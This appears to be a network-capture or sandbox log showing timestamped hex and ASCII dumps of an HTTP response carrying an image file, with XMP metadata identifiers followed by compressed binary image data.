20
                                                                                                                                                                                    Data Ascii: 4E2F6214D92C3</rdf:li> <rdf:li>xmp.did:F32157FD0A2268118DBBC452A8B34D0C</rdf:li> <rdf:li>xmp.did:F33B18EDA211E311BE359CA1EE953C32</rdf:li> <rdf:li>xmp.did:F33D40CFBB216811994CE83BBBC86D74</rdf:li> <rdf:li>xmp.did:F33E9044D9B9DF11A5DAE3431D5B5C13</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9877INData Raw: 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 31 31 42 42 37 45 30 30 46 30 45 35 46 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 31 41 37 44 31 39 42 46 41 38 31 35 33 42 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 43 41 46 46 41 38 31 44 33 34 33 45 44 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 38 35 30 44 34 32 30 39 32 30 36 38 31 31 39 37 38 35 38 30 37 37 46 33 31 41 30 32 39 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 38 39 34 31 42 31 42 38 32 30
                                                                                                                                                                                    Data Ascii: li>xmp.did:FA7F117407206811A11BB7E00F0E5F6B</rdf:li> <rdf:li>xmp.did:FA7F117407206811A1A7D19BFA8153BA</rdf:li> <rdf:li>xmp.did:FA7F117407206811ACAFFA81D343EDA5</rdf:li> <rdf:li>xmp.did:FA850D420920681197858077F31A0299</rdf:li> <rdf:li>xmp.did:FA8941B1B820
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9881INData Raw: 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 44 35 37 43 39 44 45 35 42 46 41 31 31 45 31 42 41 36 39 39 45 45 46 39 32 44 30 34 30 39 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 44 35 43 44 45 35 37 39 35 32 31 36 38 31 31 39 31 30 39 42 32 43 31 42 37 33 46 45 35 45 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 44 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 33 44 31 41 46 37 41 30 30 46 33 36 39 33 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 44 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 33 44 31 42 35 32 46 39 35 36 32 43 46 31 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 44 37 46 31
                                                                                                                                                                                    Data Ascii: > <rdf:li>xmp.did:FD57C9DE5BFA11E1BA699EEF92D04091</rdf:li> <rdf:li>xmp.did:FD5CDE57952168119109B2C1B73FE5E5</rdf:li> <rdf:li>xmp.did:FD7F11740720681183D1AF7A00F36933</rdf:li> <rdf:li>xmp.did:FD7F11740720681183D1B52F9562CF1A</rdf:li> <rdf:li>xmp.did:FD7F1
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9897INData Raw: 31 66 66 64 38 33 31 35 61 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 33 32 31 33 32 34 65 2d 30 65 62 38 2d 34 32 61 66 2d 61 61 30 35 2d 34 64 39 62 63 33 31 36 37 38 32 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 33 62 34 35 37 37 39 2d 65 62 66 62 2d 34 63 33 34 2d 62 31 63 30 2d 34 62 35 62 31 33 66 36 64 30 38 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 33 65 39 39 35 34 62 2d 30 62 34 34 2d 34 66 33 39 2d 61 36 64 61 2d 39 64 32 32 63 36 31 38 32 61 34 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 34 31 38 33 65 37 30 2d 32 61 62 61 2d 34 66 35 39 2d 62 31 62 39 2d 38 34 37 37 34 38 34 63 34
                                                                                                                                                                                    Data Ascii: 1ffd8315a7</rdf:li> <rdf:li>xmp.did:c321324e-0eb8-42af-aa05-4d9bc3167823</rdf:li> <rdf:li>xmp.did:c3b45779-ebfb-4c34-b1c0-4b5b13f6d088</rdf:li> <rdf:li>xmp.did:c3e9954b-0b44-4f39-a6da-9d22c6182a4b</rdf:li> <rdf:li>xmp.did:c4183e70-2aba-4f59-b1b9-8477484c4
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9913INData Raw: 33 31 61 65 38 33 30 65 36 34 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 37 62 39 64 61 66 38 2d 63 35 38 66 2d 34 64 66 30 2d 61 37 32 61 2d 64 64 33 62 61 66 39 34 32 39 38 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 37 66 65 35 34 33 38 2d 63 64 34 35 2d 34 30 65 32 2d 38 64 36 34 2d 62 63 65 37 63 35 62 66 62 65 65 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 38 33 63 63 35 65 65 2d 36 38 62 39 2d 34 63 37 66 2d 39 31 30 63 2d 65 36 36 33 37 66 32 61 33 61 32 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 38 34 65 65 37 61 30 2d 33 64 34 39 2d 34 37 39 64 2d 61 31 32 62 2d 39 35 62 63 33 61 66 39
                                                                                                                                                                                    Data Ascii: 31ae830e64c</rdf:li> <rdf:li>xmp.did:f7b9daf8-c58f-4df0-a72a-dd3baf94298d</rdf:li> <rdf:li>xmp.did:f7fe5438-cd45-40e2-8d64-bce7c5bfbee9</rdf:li> <rdf:li>xmp.did:f83cc5ee-68b9-4c7f-910c-e6637f2a3a23</rdf:li> <rdf:li>xmp.did:f84ee7a0-3d49-479d-a12b-95bc3af9
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9920INData Raw: eb 8d 28 5c 5c f7 3d 70 32 b5 8c 40 1d b2 42 d8 15 17 64 de b9 3a 62 4a 89 65 c9 31 b4 3c 8d 4d fa e4 80 60 a0 5e a2 b9 62 1a 27 14 16 a9 5c 50 ee 54 eb 85 5b 2d b6 d8 a8 2b 4f be 29 75 48 c2 ad 50 11 81 0b e8 68 7c 70 2a de d8 55 d8 aa d1 f8 e1 4b 8f 4e 98 a1 a2 31 4b be 58 ab 8e 2a d7 b0 c5 5c 71 43 89 ae 28 6c 1c 54 38 fe 38 a5 a2 7a 57 e5 8a 5b ad 37 18 a1 c1 bc 30 21 be 5d f1 50 e2 c4 e2 c9 c1 a9 85 56 ed 5c 55 db 9c 50 d7 5a 11 85 5b ad 37 c0 86 eb e1 8a 1a 3b 0a e1 4b b0 25 c0 ed 5e d8 a1 d4 26 b5 c2 ad 6d 8a b8 e1 56 98 6f 8a b4 3a 62 86 be 78 ab a9 df 15 68 d7 71 81 4a d2 3c 32 41 8b b7 fc 70 a4 2e c8 a5 dd 70 20 b4 76 fa 32 68 68 ef 8a ad c5 5c 3d fa 62 86 c7 be c3 01 4a f1 81 92 d3 e0 72 48 70 db 15 0d 81 81 2d 13 b5 31 41 7f ff d5 9f d3 7c f4
                                                                                                                                                                                    Data Ascii: (\\=p2@Bd:bJe1<M`^b'\PT[-+O)uHPh|p*UKN1KX*\qC(lT88zW[70!]PV\UPZ[7;K%^&mVo:bxhqJ<2Ap.p v2hh\=bJrHp-1A|
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9936INData Raw: 6e f1 c5 2e a7 4d f1 43 67 db a6 2a e2 69 d3 7c 55 af 96 2a 1c 3a 7b e0 a5 75 32 49 75 7b 60 43 44 0a e1 08 68 8f 0c 0a ec 21 2d d0 d7 15 5b d0 62 ad d3 7c 0a de f8 a8 68 ec 2b 85 5d 4c 08 6a 94 c2 55 df af 10 ad 8f 6c 2a d6 dd b1 56 80 f0 ef 8a bf ff d1 ea c4 77 ce e1 e5 9b 38 ab 54 c2 ae c0 c5 ba 62 b4 b8 1d b0 16 4d f5 c0 ae fe 98 a8 75 2b 85 5c 77 38 58 ad 18 a8 6f c6 b8 b2 71 15 a7 5c 8a 1d 41 d3 0d ab 7c 7b e1 b4 53 82 e0 25 57 50 74 c8 db 2a 5c 14 56 b8 14 05 55 5c 16 c9 7a c7 5c 16 ca 95 02 53 22 52 aa 12 9b 9c 16 90 15 a2 25 4e 40 b6 04 4a 30 ca 99 04 52 e4 0b 62 a1 dc 6d 91 55 e9 51 d3 03 20 bf 6a 0f 1c 01 36 a6 71 62 d0 06 bb 64 95 db 9c 05 5c 29 df 03 26 8e d8 43 15 ac 6b 92 08 50 69 3b 64 d8 29 3b 54 56 9b 64 98 90 85 92 86 b9 73 51 42 b2 64
                                                                                                                                                                                    Data Ascii: n.MCg*i|U*:{u2Iu{`CDh!-[b|h+]LjUl*Vw8TbMu+\w8Xoq\A|{S%WPt*\VU\z\S"R%N@J0RbmUQ j6qbd\)&CkPi;d);TVdsQBd
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9952INData Raw: ba b0 f7 a6 56 24 43 23 14 b2 6b 52 a3 32 84 dc 63 05 a9 08 dd 5b 09 92 80 a0 d1 f1 3e d9 60 95 b5 48 29 f4 cb 18 3b 8e 06 2b 80 af 5c 16 cc 06 c2 83 d3 ae 29 a7 0a e0 57 6e 07 5c 50 e0 71 56 c0 ae 29 0d 15 38 ab 8a 62 82 1b f4 fb 1c 16 ab a8 17 1b 64 e2 c3 1a 55 86 a7 be 1e 48 6b 8d 4d 31 b4 52 f1 6c 5b 62 32 3c 4c f8 55 44 42 3e 98 2e d4 0a 6c 48 17 6c 14 9b 58 d2 90 4d 76 18 69 81 2a 26 4a 9c 98 08 25 ff d6 ee 59 d5 3c fd 38 81 db 14 53 a8 46 2b 4e 23 15 a7 50 9c 56 9c 46 28 71 07 15 75 0e d8 6d 40 76 05 70 18 a1 d4 ff 00 6f 0a b7 4a f5 eb 81 2e f9 e2 ae e9 8a b8 54 1a 61 56 f1 b4 38 6d d3 1b 56 b1 b4 b7 d3 1b 56 a9 43 4c 0a d9 19 24 35 be 0b 56 c8 ed db 1b 4b b0 2b 60 6f be 28 75 36 c2 55 ad fb 8c 09 6e 98 ab a9 4c 36 86 ce 36 97 53 1b 56 8e f8 ab 87
                                                                                                                                                                                    Data Ascii: V$C#kR2c[>`H);+\)Wn\PqV)8bdUHkM1Rl[b2<LUDB>.lHlXMvi*&J%Y<8SF+N#PVF(qum@vpoJ.TaV8mVVCL$5VK+`o(u6UnL66SV
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9960INData Raw: 34 81 ba b7 a7 c9 c8 0d ed 91 b6 7c 94 ee 1c 43 c6 bf b5 50 7c 70 81 69 26 97 2b a5 39 ad 28 05 77 fd 78 29 0b 95 9f d1 04 1f 88 64 7a a0 6e a7 24 e0 97 62 77 a0 db df 08 09 26 90 42 6e 27 95 40 ee 01 cb a9 87 13 65 24 0a 36 35 eb f4 9c 8d aa 2c 2f 0e 2c 0e e0 d0 d4 75 ca c3 30 ba 69 7d 20 02 ee 6b f7 d7 04 42 42 0a 59 d4 d5 47 4f bf 2d e1 60 54 49 20 0e 7d 4e 16 b5 84 ca cc 2a 0f 5e a0 64 f6 0d a8 89 2d 5c 0a ca 36 53 b8 ae fb e5 51 92 29 5e dd 0f db 04 85 3b 52 9f c7 be 56 64 98 aa 2c 7c 4f c4 05 7f cf f0 ca c9 4b ab 18 02 30 0d 29 5a d3 6d b1 01 35 6f ff d0 f4 c9 5c db 38 14 d7 02 71 b5 a7 18 e9 88 29 e4 b0 2d 36 c5 57 53 12 ab 96 a3 15 54 e4 7b e0 a4 b6 a4 9d b1 50 e7 a8 db 10 a5 6d 4a ed 85 8b 75 24 e0 a4 ac 22 bb 61 0c 48 58 62 c9 82 8e 15 8d 01 ed
                                                                                                                                                                                    Data Ascii: 4|CP|pi&+9(wx)dzn$bw&Bn'@e$65,/,u0i} kBBYGO-`TI }N*^d-\6SQ)^;RVd,|OK0)Zm5o\8q)-6WST{PmJu$"aHXb
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9976INData Raw: 62 fc 0b bf 52 7c 32 82 dc 14 e4 67 e6 a1 7a 53 71 84 31 2e 99 c1 51 c7 ec 8d b0 45 64 86 31 12 49 e2 78 d6 a0 0e b9 75 d3 05 ee cd 5a 1d 8f 5a 64 41 4f 12 1f eb 0f 1d 54 9f a3 2c 02 d8 5a 83 30 e5 51 5c 9d 2a ba 42 21 1b 93 5a 74 c8 12 ab e2 74 6a f2 a5 06 ff 00 4e 56 43 26 ae 17 e0 fd d0 af 89 27 0c 52 54 23 51 31 e2 36 a7 52 7b e4 ee 98 73 74 d1 40 9d 6a 5b b9 c2 24 4a 69 46 7b 9a 28 e3 40 69 d0 61 02 d8 95 25 95 dd 43 1e bd 32 64 00 c4 2e 76 ad 79 01 5e df 2f 1c 09 58 17 d4 07 8f 40 77 18 41 55 48 ed 4f 01 bf c6 7a 65 66 7b b2 11 6d a1 e0 b4 a8 ff 00 3e b8 38 ad 05 63 48 1d 0f 1f b4 4d 3d bd a9 92 a4 5a a1 91 a8 09 20 83 b1 a6 45 92 93 a8 59 68 58 d7 24 10 a3 2b b1 1c 97 70 3b e4 c3 5c 94 94 2b d0 1d bc 77 3d 72 c2 95 b2 4d c2 a1 36 ae 20 2d d2 d4 77
                                                                                                                                                                                    Data Ascii: bR|2gzSq1.QEd1IxuZZdAOT,Z0Q\*B!ZttjNVC&'RT#Q16R{st@j[$JiF{(@ia%C2d.vy^/X@wAUHOzef{m>8cHM=Z EYhX$+p;\+w=rM6 -w
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9992INData Raw: b6 9d 6d ed ba cf b1 a0 24 80 68 3c 73 47 a8 d2 cf c4 b9 72 65 8a 71 23 cd 0d 07 e5 cc 9e 67 7f af ea 97 4b 6b 6b 18 07 8a af 27 6f 9d 4a 85 1e f5 cd 0c 3b 44 61 b8 40 19 48 b9 5e 15 ee 53 1f 31 79 c3 44 f2 c4 51 69 b6 76 b1 dd 11 4f 88 80 4f b7 4a e1 fe 48 ca 47 89 29 70 71 35 c7 20 8e c1 49 b5 ef 33 ea 29 c8 41 6d 67 67 4a 82 e0 97 3f ec 06 61 7e 5b 04 39 99 4e 4c fc 52 52 8b 9b bb b4 3c e6 ba 8c 03 dd 62 61 ff 00 1b e6 6c 21 8c ec 22 7e 6c 07 7a 5f 3c c9 2d c1 bc b5 91 e3 74 15 94 80 40 93 6a 54 9f 0c cb 84 e5 18 f0 1e 47 93 51 17 ba 06 e3 5b d5 21 80 41 67 21 0d 4e 45 da 4f d5 97 63 c5 1e 2b 2c 86 53 c9 6e 87 f9 9d aa 69 37 12 43 ab 48 d3 c5 28 a5 24 54 7d ff 00 d6 20 1e 27 c3 37 73 12 90 f4 b5 9d d8 e7 9b 62 bc d4 ee 3f 4a e9 3a 62 c3 02 8a 5c 2c 25
                                                                                                                                                                                    Data Ascii: m$h<sGreq#gKkk'oJ;Da@H^S1yDQivOOJHG)pq5 I3)AmggJ?a~[9NLRR<bal!"~lz_<-t@jTGQ[!Ag!NEOc+,Sni7CH($T} '7sb?J:b\,%
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10000INData Raw: 5a 63 80 15 83 c9 90 2b 16 8e 67 a9 a7 f2 ed 93 1a b2 9f ca a1 ef bc a3 21 03 d3 7a 9e e5 8a 8f d5 5c bf 1e a5 ac e9 94 a2 f2 bc 91 c3 c2 53 f0 ff 00 90 6a 4f e1 96 1c f6 c7 f2 e4 2f ff 00 0d 44 b1 94 ac b4 ea 4d 2b 91 19 d8 f8 0a b7 3e 45 4b 2b 65 bb 79 c0 56 3b 51 81 3f 2a 64 a1 a9 e2 34 d8 74 c0 04 bb f4 14 0a be a3 4c c6 25 3b 90 ad 5f ba 99 33 98 b4 47 18 bd d9 b8 f2 d6 81 75 04 5f 57 9a 08 90 a0 e4 5c 96 62 d4 f7 65 e3 f7 66 10 cf 20 77 73 8e 18 10 c6 35 2d 3a cb 4f 46 29 31 3c 6b 4e 4a 68 4f fb 00 46 fd b7 cc b8 cf 8b 77 06 50 01 2f 8b d0 50 1d b9 aa b0 d8 80 08 fb f0 12 4b 58 a5 8c 61 3f bc 66 34 ec 00 a0 c4 48 f2 41 01 6c 5a 97 d5 ea 79 d0 9e 80 8a 8c 24 12 9e 2a d9 34 80 2d dc 4b 22 0f 52 bb f4 3d 73 18 9a 6d 01 0f 15 9e a4 d7 05 ca b1 8e bb a8
                                                                                                                                                                                    Data Ascii: Zc+g!z\SjO/DM+>EK+eyV;Q?*d4tL%;_3Gu_W\bef ws5-:OF)1<kNJhOFwP/PKXa?f4HAlZy$*4-K"R=sm
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10016INData Raw: e6 07 6b 46 39 8d 41 8c 01 ad d0 36 13 d9 5f 6a b7 27 f7 3f 52 15 70 64 21 4d 07 f2 9f 7f 0c d3 4e 12 84 05 5f 13 29 d9 28 dd 23 cc ba 75 fd cc b6 d0 d8 08 ad 5f 62 c1 a8 8a 3b b3 72 ea 4e 75 1a 3d 49 c1 8f 87 21 e2 2c e4 01 23 c9 e8 1e 6e f2 7f 91 fc bb 69 a7 af 96 2e fe b1 73 3c 3e b5 d7 aa 2b c7 b8 55 53 43 5f f6 f3 5f 9f 86 63 8a e9 af 24 40 79 35 cf 99 65 9e 39 6d ed 90 c6 8c 68 77 ed e1 83 16 8e 26 89 67 2f 4b b4 9d 18 d3 d5 94 80 59 58 8f 00 00 ae 65 ea 2a 20 34 71 6e a9 67 6f 1d c4 b6 d7 10 f1 32 d4 16 03 a1 35 e9 bf 7c a6 1f 49 05 18 f9 be 87 f3 57 e6 04 1e 47 d3 da fe 08 19 6e 5e d4 43 02 3a f1 2a cc bc 79 54 7f 2f 5c c0 c0 44 67 4d 90 02 46 8b 0f fc 91 d7 ec 34 1b 79 2e b5 16 32 4b 77 f0 2c 68 77 2c 7e d1 66 ea a0 75 cc cc f9 44 cd a8 c8 6e cb
                                                                                                                                                                                    Data Ascii: kF9A6_j'?Rpd!MN_)(#u_b;rNu=I!,#ni.s<>+USC__c$@y5e9mhw&g/KYXe* 4qngo25|IWGn^C:*yT/\DgMF4y.2Kw,hw,~fuDn
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10032INData Raw: 78 bb d7 34 69 b4 bb fd 42 f2 4b 48 da b0 42 56 2f 4d 80 3f 0a c8 e4 7a df 71 ce 3b 36 4e 29 53 b0 11 ad 83 db 7f 2c bf 2a f4 7d 3f cb d2 f9 e3 cc bb c5 0a 34 89 1f 13 56 20 7c 22 ad d6 a6 81 47 1c 61 84 65 34 df e1 ec c8 fc a3 f9 75 aa f9 f2 cd 35 9b bb 63 6d 7b 33 b1 35 0a 15 20 fd 90 37 fb 47 25 97 44 01 a1 c9 87 01 90 a1 c9 99 69 7e 5a b3 f2 9c ad ac 13 07 d5 ac 55 c0 0e db 73 51 fb 5e e5 be 1c a3 1e 00 26 00 af 34 98 07 e7 87 9a af 6f 75 1f 30 5f df 5e 05 5b 89 ee 24 91 c2 d3 88 2c c4 d0 53 6a 66 4e aa b8 b6 e8 df 22 0f 25 3b 6d 51 b4 e4 01 85 62 3d 41 e8 0f b6 6a 8e 31 22 d5 c1 69 ad b6 af 7d a6 4b f5 ab 19 5a 09 59 7e 19 21 62 a4 a9 f0 23 2d c7 92 78 b9 16 99 46 f9 b0 cd 65 e5 37 4f 3c cc 5d e4 f8 8b b7 52 7b d7 36 f0 cd e2 0d db eb 64 ba d1 f9 bf
                                                                                                                                                                                    Data Ascii: x4iBKHBV/M?zq;6N)S,*}?4V |"Gae4u5cm{35 7G%Di~ZUsQ^&4ou0_^[$,SjfN"%;mQb=Aj1"i}KZY~!b#-xFe7O<]R{6d
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10039INData Raw: 91 54 6f 4f 61 81 6c 2d 26 86 84 d7 f8 e3 48 2d 19 42 9a 82 49 fc 71 a4 5b 4a e8 d5 15 df bd 4e 34 c6 d6 19 17 a5 70 d2 38 9c 5d 45 0d 7a f7 f1 c5 24 bb 90 ad 6b b7 6e e7 0d 26 da 0c a4 50 9d 8e 34 8b 69 b8 ec 70 21 d5 00 d7 6a 1f 0c 51 6e 07 be c3 16 4d 02 3a 74 38 a2 db e4 2a 40 eb fa f0 32 05 db 0a 53 a5 7f 1c 28 0d b5 18 ef 4d fe ec 0a d9 7e 9d 86 29 b5 95 ef 4d b1 43 aa 41 a1 a5 71 55 a5 98 ef 5a b7 cb 0a 09 71 a9 a5 3a e0 50 d1 90 85 a8 d8 7b 7f 4c 69 04 ac e4 4f 71 5e e3 12 8b 70 73 4e bf e6 30 d2 49 59 c9 ab bf 5e 95 c5 01 dc 88 ea 3e 11 8a 16 99 0b 00 3b f8 78 0c 28 25 a2 df e7 5f d7 8b 20 5b 6e bd a9 df 05 32 68 35 29 53 86 90 b0 1a 8e a7 7c 55 69 3d 45 7a 62 82 56 d7 6a e2 8b 71 a0 db b7 4c 21 16 b0 d7 a8 c2 86 b9 6e 4e 2c 4a df 98 d8 e0 28 68
                                                                                                                                                                                    Data Ascii: ToOal-&H-BIq[JN4p8]Ez$kn&P4ip!jQnM:t8*@2S(M~)MCAqUZq:P{LiOq^psN0IY^>;x(%_ [n2h5)S|Ui=EzbVjqL!nN,J(h
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10055INData Raw: ff 00 5c 6d 4b 9d dd 4f 1a d7 e5 81 56 97 90 30 24 fb 10 7a 62 96 d2 43 b8 23 a6 c7 7a 0c 52 0a c2 4f 2a 9e 9e 15 eb 81 49 5f ea b2 2d 29 d7 e9 c4 06 20 b7 cd bb 8d 87 6c 2c 96 97 6e 40 71 3b 74 e9 4f bb 22 82 b9 a5 34 ad 0f 5f f3 db 16 45 c4 d6 94 1d 69 be 2a ba a1 ce db 78 76 c5 2a 60 12 6b 5a 9e f8 da 08 6c 02 37 ed 8d a2 94 9c 3f d9 43 8a 0a bc 16 f2 4f c9 80 34 45 2c 6b b0 f9 57 c4 e6 2e 7c e3 18 76 3a 4d 1c f5 12 e1 08 6f ad a3 cc f6 f1 86 12 44 17 d4 e5 43 42 db 80 29 ed 95 e9 73 f8 c2 db b5 da 53 a6 3c 2a a4 b9 03 6d fc 4e df ab 33 5d 41 53 e4 fd cf fb 79 26 34 e0 49 a2 6e 70 52 b7 cd 91 b8 d3 e1 c5 95 b5 cd 99 b6 dc e2 ae 57 2a 68 0d 7e 7d b1 4d 34 59 aa 37 e9 fe 7f 2c 58 90 d2 3b 7d 96 a9 ae 25 93 6d 20 4e 9d 46 21 6c 36 1d 48 f8 87 df 8d 26 db
                                                                                                                                                                                    Data Ascii: \mKOV0$zbC#zRO*I_-) l,n@q;tO"4_Ei*xv*`kZl7?CO4E,kW.|v:MoDCB)sS<*mN3]ASy&4InpRW*h~}M4Y7,X;}%m NF!l6H&
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10071INData Raw: a7 e2 0f b6 02 d8 56 0a 76 35 a7 f9 fc b0 35 37 b7 1e 20 f5 1b e2 ca 9c 58 11 bf 4e a3 be 46 d9 00 b5 64 15 a0 fe cc 06 55 b9 6d 8c 2c d0 e6 59 ae 8d e5 a8 6d 22 1a 86 ac ca 12 81 95 0f 6f 0e 43 b9 f0 5c e4 35 dd a4 7e 88 3e 91 d9 5d 86 3f bc cb fe 95 ff d1 f2 cd 9d b5 d3 ff 00 75 19 64 3d 79 7d 93 f3 cc 69 c8 75 77 d9 32 46 3b 95 57 d1 2f 58 96 0a 94 3e 0c 0e 40 67 15 bb 8f f9 b8 32 1d 37 55 83 cb 36 32 59 cb 17 2b eb 81 40 48 04 22 1f 03 e2 d9 8d c3 e2 cb 67 51 a8 3c 73 b0 fa 0f fe 71 ef f2 56 cb cd 31 2e bd ab cb 18 4e 55 82 d1 eb 49 69 fb 4d d3 e1 ff 00 57 33 8c 44 36 0b e1 88 f3 4d 3f 3f 7f 35 74 ef 25 b5 e7 95 3c 97 0d bc 1a 9a db 7f a5 cf 13 16 f4 7b 7a 71 9e 81 e9 df f6 72 07 63 bb 8f 3f 4b e1 9a b5 cc 86 47 24 b3 31 24 9e a4 ff 00 5c b0 b4 99 75
                                                                                                                                                                                    Data Ascii: Vv557 XNFdUm,Ym"oC\5~>]?ud=y}iuw2F;W/X>@g27U62Y+@H"gQ<sqV1.NUIiMW3D6M??5t%<{zqrc?KG$1$\u
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10079INData Raw: 2a 7e 8c c6 95 44 6e 13 24 c7 50 b1 d6 74 d4 13 4f 29 88 1f b2 a5 fe 23 fe c4 74 cc 4c 72 c7 90 d0 16 df 8f 19 28 bb 08 2f 35 3b 49 24 e4 f7 17 84 82 3b fc 03 21 3c 5c 32 a0 28 39 12 c5 21 cd 25 d5 b5 e1 ac fa 42 71 c6 48 00 5a 01 b3 01 fa 8e 65 62 d3 78 77 5f c4 d6 01 16 15 9e f3 47 7f 52 59 61 7f 53 d3 a4 61 58 2a f2 f1 6d 8d 7e 42 99 08 c2 63 62 d5 1d b9 b1 c6 bd 9d c9 de 80 f5 a6 6c 7c 31 d5 99 dd bb 47 e6 dc 5f 91 07 ad 37 34 c2 40 63 44 ad 94 71 34 de 9d b0 86 29 f6 87 a8 5a da c4 63 71 c6 4e b5 3d 0e 56 43 b7 d3 65 8c 45 14 25 c5 c7 39 19 eb 5a 9d b2 c7 55 92 7c 45 0f 0d 1a 40 64 6a 0a f8 64 24 50 0d 1d d3 9b ab 88 65 a2 47 b2 81 f4 57 21 13 b3 95 9e 62 43 64 96 ea 62 c7 80 07 8d 7a e4 ed c0 02 90 f1 b9 46 ae 48 6c d8 0e ec 8a 6b 69 63 d3 05 e3 ba
                                                                                                                                                                                    Data Ascii: *~Dn$PtO)#tLr(/5;I$;!<\2(9!%BqHZebxw_GRYaSaX*m~Bcbl|1G_74@cDq4)ZcqN=VCeE%9ZU|E@djd$PeGW!bCdbzFHlkic
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10095INData Raw: 98 48 3e ab e4 09 9b f9 96 83 e9 a0 ae 11 f5 35 4f fb a7 8c 93 f1 f7 da 99 b0 0f 24 79 b7 db 16 2e 03 6a ff 00 9d 71 54 3b 57 97 b7 f1 c5 34 ac bd 31 4a b4 13 3d b4 8b 2a 12 19 4d 46 47 98 6c c7 23 03 6f 63 d0 35 75 f3 0e 9e b3 56 97 11 ec e3 a6 fe 39 85 21 4f 53 86 7e 24 6d 2e d7 6c 03 7f a5 46 37 04 72 03 6a 7b e3 12 92 91 3b 7c 42 45 af c3 d6 bd eb 93 2c 0a 9f 03 ea f1 1d 1b 71 85 8d 22 4f c3 46 a6 29 54 ae df 76 16 61 69 1f 17 87 6c 93 26 c0 a0 eb bf eb ca d8 b4 e0 f5 ef 92 0c c2 85 c8 20 09 16 bb 6d 88 36 d6 5c a7 d4 4f 88 77 c5 2a 8c 36 f7 19 24 ad f4 95 bc 6b d3 2b 25 05 30 d3 f5 db fd 1d 5a 38 5b d4 46 1d 24 de 9e 19 51 c4 0b 95 0c d2 83 24 d1 bc d5 1d c7 c1 7c aa 84 6f 5a d0 d3 fc 9f d9 d8 fb e5 12 c5 4e 64 35 40 f3 65 96 13 41 a8 2a b4 26 aa ca
                                                                                                                                                                                    Data Ascii: H>5O$y.jqT;W41J=*MFGl#oc5uV9!OS~$m.lF7rj{;|BE,q"OF)Tvail& m6\Ow*6$k+%0Z8[F$Q$|oZNd5@eA*&
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10111INData Raw: a7 dc c3 51 32 98 c0 df e3 f8 7e ea f5 ca 8c 83 2b 44 db 69 d7 2f 66 f7 a7 fd e6 8c 8a d7 6e 55 ec 33 1e 59 87 17 08 65 76 ab ad 5c 5b de ac 51 5a 69 ed 6e 63 1f 11 52 59 9a be 38 e0 c5 28 92 64 78 ad 22 40 0a 63 a6 64 ee 28 dd f3 3e a9 14 be 23 11 70 58 9a 57 7c ae 60 91 b3 59 09 a4 b3 47 f5 b1 3d a2 71 84 52 8b 5a fc f2 98 c4 81 bb 3b 59 2e a0 a8 e7 80 34 ae 4b 72 16 4a f6 da bd be 9e ed 70 a8 64 b9 3b 0a f4 1e f9 64 1b b1 ce 99 0e 85 ae 5d eb 73 0b 68 2d 8c 93 1e 9c 0d 17 e6 c4 f4 5c 99 6c 39 56 79 9e ee e3 46 e5 6b 31 e3 7c c7 e3 50 01 55 5f d9 21 bf 6a b9 1a b6 93 3b 61 e9 78 11 4d 63 53 25 6a 1f b8 fe 07 12 1a c3 46 ee 69 1c bb b1 24 f8 e3 c2 03 68 c8 56 c9 3c 92 0a 16 34 f9 e2 22 14 e4 3d ea d6 